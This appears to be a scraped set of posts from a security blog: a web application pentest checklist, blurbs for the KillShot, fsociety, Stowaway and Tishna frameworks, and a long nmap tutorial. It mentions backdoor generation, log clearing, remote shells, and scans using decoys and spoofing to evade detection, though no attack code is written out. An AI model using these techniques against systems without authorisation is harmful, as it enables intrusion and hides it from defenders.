1. Check if it is possible to “reuse” the session after Logout.also check if the application automatically logs out a user has idle for a certain amount of time.

2. Check whether any sensitive information  Remain Stored stored in browser cache.

3. Check and try to Reset the password, by social engineering crack secretive questions and guessing.

4. Check if the “Remember my password” Mechanism is implemented by checking the HTML code of the login page.

5. Check if the hardware devices directly communicate and independently with authentication infrastructure using an additional communication channel.

6. Test CAPTCHA for authentication vulnerabilities presented or not.

7. Check whether any weak security questions/Answer are presented.

8. A successful SQL injection could lead to the loss of customer trust and attackers can steal phone numbers, addresses, and credit card details. Placing a web application firewall can filter out the malicious SQL queries in the traffic.

Authorization Testing

1. Test the Role and Privilege Manipulation to Access the Resources.

2. Test For Path Traversal by Performing input Vector Enumeration and analyze the input validation functions presented in the web application.

3. Test for cookie and parameter Tempering using web spider tools.

4. Test for HTTP Request Tempering and check whether to gain illegal access to reserved resources.

Configuration  Management Testing

1. Check directory and File Enumeration review server and application Documentation. also, check the infrastructure and application admin interfaces.

2. Analyze the Web server banner and Performing network scanning.

3. Check and verify the presence of old Documentation and Backup and referenced files such as source codes, passwords, installation paths.

4. Check and identify the ports associated with the SSL/TLS services using NMAP and NESSUS.

5. Review OPTIONS HTTP method using Netcat and Telnet.

6. Test for HTTP methods and XST for credentials of legitimate users.

7. Perform application configuration management test to review the information of the source code, log files and default Error Codes.

Session Management Testing

1. Check the URL’s in the Restricted area to Test for Cross sight Request Forgery.

2. Test for Exposed Session variables by inspecting Encryption and reuse of session token, Proxies and caching, GET&POST.

3. Collect a sufficient number of cookie samples and analyze the cookie sample algorithm and forge a valid Cookie in order to perform an Attack.

4. Test the cookie attribute using intercept proxies such as Burp Proxy, OWASP ZAP, or traffic intercept proxies such as Temper Data.

5. Test the session Fixation, to avoid seal user session.(session Hijacking )

Data Validation Testing

1. Performing Sources code Analyze for javascript Coding Errors.

2. Perform Union Query SQL injection testing, standard SQL injection Testing, blind  SQL query Testing, using tools such as sqlninja,sqldumper,sql power injector .etc.

3. Analyze the HTML Code, Test for stored XSS, leverage stored XSS, using tools such as XSS proxy, Backframe, Burp Proxy, OWASP, ZAP, XSS Assistant.

4. Perform LDAP injection testing for sensitive information about users and hosts.

5. Perform IMAP/SMTP injection Testing for Access the Backend Mail server.

6. Perform XPATH Injection Testing for Accessing the confidential information

7. Perform XML injection testing to know information about XML Structure.

8. Perform Code injection testing to identify input validation Error.

9. Perform Buffer Overflow testing for Stack and heap memory information and application control flow.

10. Test for HTTP Splitting and smuggling for cookies and HTTP redirect information.

Denial of Service Testing

1. Send Any Large number of Requests that perform database operations and observe any Slowdown and  New Error Messages.

2.Perform manual source code analysis and submit a range of input varying lengths to the applications

3. Test for SQL wildcard attacks for application information testing. Enterprise Networks should choose the best DDoS Attack prevention services to ensure the DDoS attack protection and prevent their network

4. Test for User specifies object allocation whether a maximum number of object that application can handle.

5. Enter Extreme Large number of the input field used by the application as a Loop counter. Protect website from future attacks Also Check your Companies DDOS Attack Downtime Cost.

6. Use a script to automatically submit an extremely long value for the server can be logged the request.

The post Web Application Penetration Testing Checklist – A Detailed Cheat Sheet appeared first on Tech Chronicles.

A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner

Why KillShot ?

You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot

This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan xss and sql

Help option

Use Shodan By targ option

CreateAccount Here Register and get Your aip Shodan AIP And Add your shodan AIP to aip.txt < only your aip should be show in the aip.txt > Use targ To search about Vulnrable Targets in shodan databases

Use targ To scan Ip of servers fast with shodan

Menu Site

{0} Spider 
{1} Web technologie 
{2} WebApp Vul Scanner
{3} Port Scanner
{4} CMS Scanner
{5} Fuzzers 
{6} Cms Exploit Scanner
{7} Backdoor Generation
{8} Linux Log Clear

WebApp Vul Scanner

{1} Xss scanner
{2} Sql Scanner
{3} Tomcat RCE

Port Scanner

 [0] Nmap Scan
 [1] Unicorn Scan
Nmap Scan 
 [2] Nmap Os Scan 
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan 
 [5] Nmap All scan
 [6] Nmap Http Option Scan 
 [7] Nmap Live target In Network
Unicorn Scan
[8] Services OS 
[9] TCP SYN Scan on a whole network 
[01] UDP scan on the whole network

Backdoor Generation

 {1} Generate Shell
 {2} Connect Shell

USAGE

1 ----- Help Command 
[site]  MAKE YOUR TARGET
[help] show this MESSAGE
[exit] show this MESSAGE
2 ------ Site command 
Put your target www.example.com
without the http

Linux Setup

git clone https://github.com/bahaabdelwahed/killshot
cd killshot
ruby setup.rb (if setup show any error just try to install the gems/tool manual )
ruby killshot.rb

Windows Setup

Download ruby for windows ==> https://rubyinstaller.org/downloads/
Download Cmder here       ==> http://cmder.net/
Download Curl For 64/32   ==> https://curl.haxx.se/windows/
Download nmap             ==> https://nmap.org/download.html      

Enjoy !

The post Killshot: Penetration Testing Framework appeared first on Tech Chronicles.

$ git clone https://github.com/fsociety-team/fsociety.git

$ pip install fsociety

$ docker pull fsocietyteam/fsociety
$ docker run -it fsocietyteam/fsociety fsociety

$ git clone https://github.com/fsociety-team/fsociety.git
$ pip install -e ".[dev]"

$ fsociety -h

usage: fsociety [-h] [-i] [-s]

A Penetration Testing Framework

optional arguments:
  -h, --help     show this help message and exit
  -i, --info     gets fsociety info
  -s, --suggest  suggest a tool

The post fsociety: Modular Penetration Testing Framework appeared first on Tech Chronicles.

The post How To Create A Virtual Penetration Testing Lab At Home appeared first on Tech Chronicles.

Nmap is short for Network Mapper. It is an open source security tool for network exploration, security scanning and auditing. However, nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. The purpose of this post is to introduce a user to the nmap command line tool to scan a host and/or network, so to find out the possible vulnerable points in the hosts. You will also learn how to use Nmap for offensive and defensive purposes.

Let us see some common nmap command examples.

What is Nmap and what is it used for?

From the man page:

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

It was originally written by Gordon Lyon and it can answer the following questions easily:

1. What computers did you find running on the local network?
2. What IP addresses did you find running on the local network?
3. What is the operating system of your target machine?
4. Find out what ports are open on the machine that you just scanned?
5. Find out if the system is infected with malware or virus.
6. Search for unauthorized servers or network service on your network.
7. Find and remove computers which don’t meet the organization’s minimum level of security.

Sample setup (LAB)

Port scanning may be illegal in some jurisdictions. So setup a lab as follows:

                              +---------+
        +---------+           | Network |         +--------+
        | server1 |-----------+ swtich  +---------|server2 |
        +---------+           | (sw0)   |         +--------+
                              +----+----+
                                   | 
                                   |
                         +---------+----------+
                         | wks01 Linux/OSX    |
                         +--------------------+

Where,

• wks01 is your computer either running Linux/OS X or Unix like operating system. It is used for scanning your local network. The nmap command must be installed on this computer.
• server1 can be powered by Linux / Unix / MS-Windows operating systems. This is an unpatched server. Feel free to install a few services such as a web-server, file server and so on.
• server2 can be powered by Linux / Unix / MS-Windows operating systems. This is a fully patched server with firewall. Again, feel free to install few services such as a web-server, file server and so on.
• All three systems are connected via switch.

#1: Scan a single host or an IP address (IPv4)

### Scan a single ip address ###
nmap 192.168.1.1
 
## Scan a host name ###
nmap server1.cyberciti.biz
 
## Scan a host name with more info###
nmap -v server1.cyberciti.biz

Sample outputs:

#2: Scan multiple IP address or subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3
## works with same subnet i.e. 192.168.1.0/24 
nmap 192.168.1.1,2,3

You can scan a range of IP address too:

nmap 192.168.1.1-20

You can scan a range of IP address using a wildcard:

nmap 192.168.1.*

Finally, you scan an entire subnet:

nmap 192.168.1.0/24

#3: Read list of hosts/networks from a file (IPv4)

The -iL option allows you to read the list of target systems using a text file. This is useful to scan a large number of hosts/networks. Create a text file as follows:
cat > /tmp/test.txt

Sample outputs:

server1.cyberciti.biz
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost

The syntax is:

nmap -iL /tmp/test.txt

#4: Excluding hosts/networks (IPv4)

When scanning a large number of hosts/networks you can exclude hosts from a scan:

nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254

OR exclude list from a file called /tmp/exclude.txt

nmap -iL /tmp/scanlist.txt --excludefile /tmp/exclude.txt

#5: Turn on OS and version detection scanning script (IPv4)

nmap -A 192.168.1.254
nmap -v -A 192.168.1.1
nmap -A -iL /tmp/scanlist.txt 

#6: Find out if a host/network is protected by a firewall

nmap -sA 192.168.1.254
nmap -sA server1.cyberciti.biz

#7: Scan a host when protected by the firewall

nmap -PN 192.168.1.1
nmap -PN server1.cyberciti.biz

#8: Scan an IPv6 host/address

The -6 option enable IPv6 scanning. The syntax is:

nmap -6 IPv6-Address-Here
nmap -6 server1.cyberciti.biz
nmap -6 2607:f0d0:1002:51::4
nmap -v A -6 2607:f0d0:1002:51::4

#9: Scan a network and find out which servers and devices are up and running

This is known as host discovery or ping scan:

nmap -sP 192.168.1.0/24

Sample outputs:

Host 192.168.1.1 is up (0.00035s latency).
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Host 192.168.1.2 is up (0.0038s latency).
MAC Address: 74:44:01:40:57:FB (Unknown)
Host 192.168.1.5 is up.
Host nas03 (192.168.1.12) is up (0.0091s latency).
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.80 second

#10: How do I perform a fast scan?

nmap -F 192.168.1.1

#11: Display the reason a port is in a particular state

nmap --reason 192.168.1.1
nmap --reason server1.cyberciti.biz

#12: Only show open (or possibly open) ports

nmap --open 192.168.1.1
nmap --open server1.cyberciti.biz

#13: Show all packets sent and received

nmap --packet-trace 192.168.1.1
nmap --packet-trace server1.cyberciti.biz

14#: Show host interfaces and routes

This is useful for debugging (ip command or route command or netstat command like output using nmap)

nmap --iflist

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 02:01 IST
************************INTERFACES************************
DEV    (SHORT)  IP/MASK          TYPE        UP MAC
lo     (lo)     127.0.0.1/8      loopback    up
eth0   (eth0)   192.168.1.5/24   ethernet    up B8:AC:6F:65:31:E5
vmnet1 (vmnet1) 192.168.121.1/24 ethernet    up 00:50:56:C0:00:01
vmnet8 (vmnet8) 192.168.179.1/24 ethernet    up 00:50:56:C0:00:08
ppp0   (ppp0)   10.1.19.69/32    point2point up
 
**************************ROUTES**************************
DST/MASK         DEV    GATEWAY
10.0.31.178/32   ppp0
209.133.67.35/32 eth0   192.168.1.2
192.168.1.0/0    eth0
192.168.121.0/0  vmnet1
192.168.179.0/0  vmnet8
169.254.0.0/0    eth0
10.0.0.0/0       ppp0
0.0.0.0/0        eth0   192.168.1.2

#15: How do I scan specific ports?

nmap -p [port] hostName
## Scan port 80
nmap -p 80 192.168.1.1
 
## Scan TCP port 80
nmap -p T:80 192.168.1.1
 
## Scan UDP port 53
nmap -p U:53 192.168.1.1
 
## Scan two ports ##
nmap -p 80,443 192.168.1.1
 
## Scan port ranges ##
nmap -p 80-200 192.168.1.1
 
## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
 
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
 
## Scan top ports i.e. scan $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios-ssn
443/tcp  closed https
445/tcp  closed microsoft-ds
3389/tcp closed ms-term-serv
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
 
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds

#16: The fastest way to scan all your devices/computers for open ports ever

nmap -T5 192.168.1.0/24

#17: How do I detect remote operating system?

You can identify a remote host apps and OS using the -O option:

nmap -O 192.168.1.1
nmap -O  --osscan-guess 192.168.1.1
nmap -v -O --osscan-guess 192.168.1.1

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:29 IST
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 01:29
Scanning 192.168.1.1 [1 port]
Completed ARP Ping Scan at 01:29, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:29
Completed Parallel DNS resolution of 1 host. at 01:29, 0.22s elapsed
Initiating SYN Stealth Scan at 01:29
Scanning 192.168.1.1 [1000 ports]
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 22/tcp on 192.168.1.1
Completed SYN Stealth Scan at 01:29, 0.16s elapsed (1000 total ports)
Initiating OS detection (try #1) against 192.168.1.1
Retrying OS detection (try #2) against 192.168.1.1
Retrying OS detection (try #3) against 192.168.1.1
Retrying OS detection (try #4) against 192.168.1.1
Retrying OS detection (try #5) against 192.168.1.1
Host 192.168.1.1 is up (0.00049s latency).
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Device type: WAP|general purpose|router|printer|broadband router
Running (JUST GUESSING) : Linksys Linux 2.4.X (95%), Linux 2.4.X|2.6.X (94%), MikroTik RouterOS 3.X (92%), Lexmark embedded (90%), Enterasys embedded (89%), D-Link Linux 2.4.X (89%), Netgear Linux 2.4.X (89%)
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.6.15 - 2.6.23 (embedded) (92%), Linux 2.6.15 - 2.6.24 (92%), MikroTik RouterOS 3.0beta5 (92%), MikroTik RouterOS 3.17 (92%), Linux 2.6.24 (91%), Linux 2.6.22 (90%)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=11/27%OT=22%CT=1%CU=30609%PV=Y%DS=1%G=Y%M=BCAEC5%TM=50B3CA
OS:4B%P=x86_64-unknown-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M2300ST11NW2%O2=M2300ST11NW2%O3=M2300NNT11NW2%O4=M2300ST11NW2%O5
OS:=M2300ST11NW2%O6=M2300ST11)WIN(W1=45E8%W2=45E8%W3=45E8%W4=45E8%W5=45E8%W
OS:6=45E8)ECN(R=Y%DF=Y%T=40%W=4600%O=M2300NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID
OS:=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 12.990 days (since Wed Nov 14 01:44:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds
           Raw packets sent: 1126 (53.832KB) | Rcvd: 1066 (46.100KB)

See also: Fingerprinting a web-server and a dns server command line tools for more information.

#18: How do I detect remote services (server / daemon) version numbers?

nmap -sV 192.168.1.1

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:34 IST
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     Dropbear sshd 0.52 (protocol 2.0)
80/tcp open  http?
1 service unrecognized despite returning data.

#19: Scan a host using TCP ACK (PA) and TCP Syn (PS) ping

If firewall is blocking standard ICMP pings, try the following host discovery methods:

nmap -PS 192.168.1.1
nmap -PS 80,21,443 192.168.1.1
nmap -PA 192.168.1.1
nmap -PA 80,21,200-512 192.168.1.1

#20: Scan a host using IP protocol ping

nmap -PO 192.168.1.1

#21: Scan a host using UDP ping

This scan bypasses firewalls and filters that only screen TCP:

nmap -PU 192.168.1.1
nmap -PU 2000.2001 192.168.1.1

#22: Find out the most commonly used TCP ports using TCP SYN Scan

### Stealthy scan ###
nmap -sS 192.168.1.1
 
### Find out the most commonly used TCP ports using  TCP connect scan (warning: no stealth scan)
###  OS Fingerprinting ###
nmap -sT 192.168.1.1
 
### Find out the most commonly used TCP ports using TCP ACK scan
nmap -sA 192.168.1.1
 
### Find out the most commonly used TCP ports using TCP Window scan
nmap -sW 192.168.1.1
 
### Find out the most commonly used TCP ports using TCP Maimon scan
nmap -sM 192.168.1.1

#23: Scan a host for UDP services (UDP scan)

Most popular services on the Internet run over the TCP protocol. DNS, SNMP, and DHCP are three of the most common UDP services. Use the following syntax to find out UDP services:

nmap -sU nas03
nmap -sU 192.168.1.1

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 00:52 IST
Stats: 0:05:29 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 32.49% done; ETC: 01:09 (0:11:26 remaining)
Interesting ports on nas03 (192.168.1.12):
Not shown: 995 closed ports
PORT     STATE         SERVICE
111/udp  open|filtered rpcbind
123/udp  open|filtered ntp
161/udp  open|filtered snmp
2049/udp open|filtered nfs
5353/udp open|filtered zeroconf
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
 
Nmap done: 1 IP address (1 host up) scanned in 1099.55 seconds

#24: Scan for IP protocol

This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines:

nmap -sO 192.168.1.1

#25: Scan a firewall for security weakness

The following scan types exploit a subtle loophole in the TCP and good for testing security of common attacks:

## TCP Null Scan to fool a firewall to generate a response ##
## Does not set any bits (TCP flag header is 0) ##
nmap -sN 192.168.1.254
 
## TCP Fin scan to check firewall ##
## Sets just the TCP FIN bit ##
nmap -sF 192.168.1.254
 
## TCP Xmas scan to check firewall ##
## Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree ##
nmap -sX 192.168.1.254

See how to block Xmas packkets, syn-floods and other conman attacks with iptables.

#26: Scan a firewall for packets fragments

The -f option causes the requested scan (including ping scans) to use tiny fragmented IP packets. The idea is to split up the TCP header over
several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing.

<pre “=”” lang=”bash”>nmap -f 192.168.1.1 nmap -f fw2.nixcraft.net.in nmap -f 15 fw2.nixcraft.net.in ## Set your own offset size with the –mtu option ## nmap –mtu 32 192.168.1.1

#27: Cloak a scan with decoys

The -D option it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won’t know which IP was scanning them and which were innocent decoys:

nmap -n -Ddecoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip
nmap -n -D192.168.1.5,10.5.1.2,172.1.2.4,3.4.2.1 192.168.1.5

#28: Scan a firewall for MAC address spoofing

### Spoof your MAC address ##
nmap --spoof-mac MAC-ADDRESS-HERE 192.168.1.1
 
### Add other options ###
nmap -v -sT -PN --spoof-mac MAC-ADDRESS-HERE 192.168.1.1
 
 
### Use a random MAC address ###
### The number 0, means nmap chooses a completely random MAC address ###
nmap -v -sT -PN --spoof-mac 0 192.168.1.1

#29: How do I save output to a text file?

The syntax is:

nmap 192.168.1.1 > output.txt
nmap -oN /path/to/filename 192.168.1.1
nmap -oN output.txt 192.168.1.1

#30 Scans for web servers and pipes into Nikto for scanning

nmap -p80 192.168.1.2/24 -oG - | /path/to/nikto.pl -h -
nmap -p80,443 192.168.1.2/24 -oG - | /path/to/nikto.pl -h -

#31 Speed up nmap

Pass the -T option:
nmap -v -sS -A -T4 192.168.2.5

Sample outputs:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-15 01:52 IST
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:52
Completed NSE at 01:52, 0.00s elapsed
Initiating NSE at 01:52
Completed NSE at 01:52, 0.00s elapsed
Initiating ARP Ping Scan at 01:52
Scanning 192.168.2.15 [1 port]
Completed ARP Ping Scan at 01:52, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 01:52
Scanning dellm6700 (192.168.2.15) [1000 ports]
Discovered open port 5900/tcp on 192.168.2.15
Discovered open port 80/tcp on 192.168.2.15
Discovered open port 22/tcp on 192.168.2.15
Completed SYN Stealth Scan at 01:53, 4.62s elapsed (1000 total ports)
Initiating Service scan at 01:53
Scanning 3 services on dellm6700 (192.168.2.15)
Completed Service scan at 01:53, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against dellm6700 (192.168.2.15)
Retrying OS detection (try #2) against dellm6700 (192.168.2.15)
NSE: Script scanning 192.168.2.15.
Initiating NSE at 01:53
Completed NSE at 01:53, 30.02s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Nmap scan report for dellm6700 (192.168.2.15)
Host is up (0.00044s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   open   ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-OpenSSH_7.4p1 Ubuntu-10
| ssh-hostkey: 
|   2048 1d:14:84:f0:c7:21:10:0e:30:d9:f9:59:6b:c3:95:97 (RSA)
|_  256 dc:59:c6:6e:33:33:f2:d2:5d:9b:fd:b4:9c:52:c1:0a (ECDSA)
80/tcp   open   http    nginx 1.10.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp  closed https
5900/tcp open   vnc     VNC (protocol 3.7)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.40%I=7%D=5/15%Time=5918BCAA%P=x86_64-apple-darwin16.3.0%
SF:r(NULL,20,"SSH-2\.0-OpenSSH_7\.4p1\x20Ubuntu-10\n");
MAC Address: F0:1F:AF:1F:2C:60 (Dell)
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (95%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Linux 3.11 - 4.1 (95%), Linux 4.4 (95%), Linux 3.13 (92%), Linux 4.0 (90%), Linux 2.6.32 (89%), Linux 2.6.32 or 3.10 (89%), Linux 3.2 - 3.8 (89%), Linux 3.10 - 3.12 (88%), Linux 2.6.32 - 2.6.33 (87%), Linux 2.6.32 - 2.6.35 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Mon May 15 01:53:08 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms dellm6700 (192.168.2.15)

NSE: Script Post-scanning.
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.02 seconds
           Raw packets sent: 2075 (95.016KB) | Rcvd: 50 (3.084KB)

#32: Not a fan of command line tools?

Try zenmap the official network mapper front end:

Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

You can install zenmap using the following apt-get command:
$ sudo apt-get install zenmap

Sample outputs:

[sudo] password for vivek: 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  zenmap
0 upgraded, 1 newly installed, 0 to remove and 11 not upgraded.
Need to get 616 kB of archives.
After this operation, 1,827 kB of additional disk space will be used.
Get:1 http://debian.osuosl.org/debian/ squeeze/main zenmap amd64 5.00-3 [616 kB]
Fetched 616 kB in 3s (199 kB/s)                       
Selecting previously deselected package zenmap.
(Reading database ... 281105 files and directories currently installed.)
Unpacking zenmap (from .../zenmap_5.00-3_amd64.deb) ...
Processing triggers for desktop-file-utils ...
Processing triggers for gnome-menus ...
Processing triggers for man-db ...
Setting up zenmap (5.00-3) ...
Processing triggers for python-central ...

Type the following command to start zenmap:
$ sudo zenmap

Sample outputs

References:

• The official Nmap project guide to network discovery and security Scanning.
• The official Nmap project home page.

The nmap command has many more options, please go through man page or the documentation for more information. 

The post Top 32 Nmap Commands For Linux Sys/Network Admins appeared first on Tech Chronicles.

Stowaway is Multi-hop proxy tool for security researchers and pentesters. Users can easily proxy their network traffic to intranet nodes (multi-layer)

PS: The files under demo folder are Stowaway’s beta version,it’s still functional, you can check the detail by README.md file under the demo folder

This tool is limited to security research and teaching, and the user bears all legal and related responsibilities caused by the use of this tool! The author and publisher does not assume any legal and related responsibilities!

Features

• Obvious node topology
• Multi-hop socks5 traffic proxy
• Multi-hop ssh traffic proxy
• Remote interactive shell
• Network traffic encryption with AES-256(CBC mode)
• Support macos and linux

Usage

Stowaway can be excuted as two kinds of mode: admin && agent
If you don’t want to compile the project by yourself, you can check the release folder to get ONE!

Simple example：

  Admin mode：./stowaway admin -l 9999 -s 123
  
  Meaning：
  
  admin  It means Stowaway is started as admin mode
  
  -l     It means Stowaway is listening on port 9999 and waiting for incoming connection

  -s     It means Stowaway has used 123 as the encrypt key during the communication
  
  Be aware! -s option's value must be as same as the agents' 

  For now, there are only three options above are supported!
 

  agent mode： ./stowaway agent -m 127.0.0.1:9999 -l 10000 --startnode -s 123 -r
  
  Meaning：
  
  agent It means Stowaway is started as agent mode 
  
  -m    It means Stowaway's monitor node's address (In this case,it's the node we started above)
  
  -l    It means Stowaway is listening on port 10000 and waiting for incoming connection 

  -s    It means Stowaway has used 123 as the encrypt key during the communication 

  --startnode  It means Stowaway is started as FIRST agent node(if the node is the first one , you MUST add this option!!! And there are two submode of agent mode,if you want to start the second, third one....., just remove this option)

  -r It means you want to start the node in reverse mode(For instance: you can add node 2 into the net via node 1 actively connect to node 2, instead of node 1 just waiting for the connection from node 2 )

  Be aware! -s option's value must be as same as the agents' 

 For now, there are only five options above are supported!

Example

For instance(one admin;one startnode;two simple nodes)

Admin

Startnode

First simple Node (setting as reverse mode)

Now, use admin and type in “use 1” -> “connect 127.0.0.1:10001” ,then you can add node 1 into the net
Second simple Node

When all agent nodes connected，check the topology in admin

Now we manipulate the second simple node through admin

Open the remote interactive shell

Now you can use interactive shell (the second simple node’s) through admin
Start socks5 proxy service

Now you can use the admin’s port 7777 as the socks5 proxy service. And it can proxy your traffic to the second simple node and the second simple node will do its work as socks server（ When you want to shut down this socks5 service, just type in “stopsocks” under this mode to turn off it)

Open ssh

And it can proxy your ssh traffic to the second simple node and the second simple node will do its work as ssh cilent
PS: In this function,you can type in pwd to check where you currently are

For more detail, just type help to get further informations

Attention

• This porject is coding just for fun , the logic structure and code structure are not strict enough, please don’t be so serious about it
• When the admin offline, all agent nodes will offline too(maybe it will be changed in future)
• When one of the agents offline, the agent nodes after it will offline
• Once the admin started, you need to connect at least one agent node to it before you do any operations
• If you want to compile this project for supporting more platform, you can use go build -ldflags="-w -s" to do that
• Temporarily does not support Windows

The post Stowaway – Multi-hop Proxy Tool For Pentesters appeared first on Tech Chronicles.

A complete Automated pentest framework for Servers, Application Layer to Web Security

Interface

• The software has 62 Options with full automation and can be use aas a web security swiss knife

Tishna

• Tishna is a Web Server Security Penetration Software for Ultimate Security Analaysis
• Kali, Parrot OS, Black Arch, Termux, Android Led TV

Appeared

• Cyber Space (Computer Security)
• Terror Security (Computer Security)
• National Cyber Security Services

Brief Introduction

• Tishna is useful in Banks, Private Organisations and Ethical hacker personnel for legal auditing.
• It serves as a defense method to find as much as information possible for gaining unauthorised access and intrusion.
• With the emergence of more advanced technology, cybercriminals have also found more ways to get into the system of many organizations.
• Tishna software can audit, servers and web behaviour.
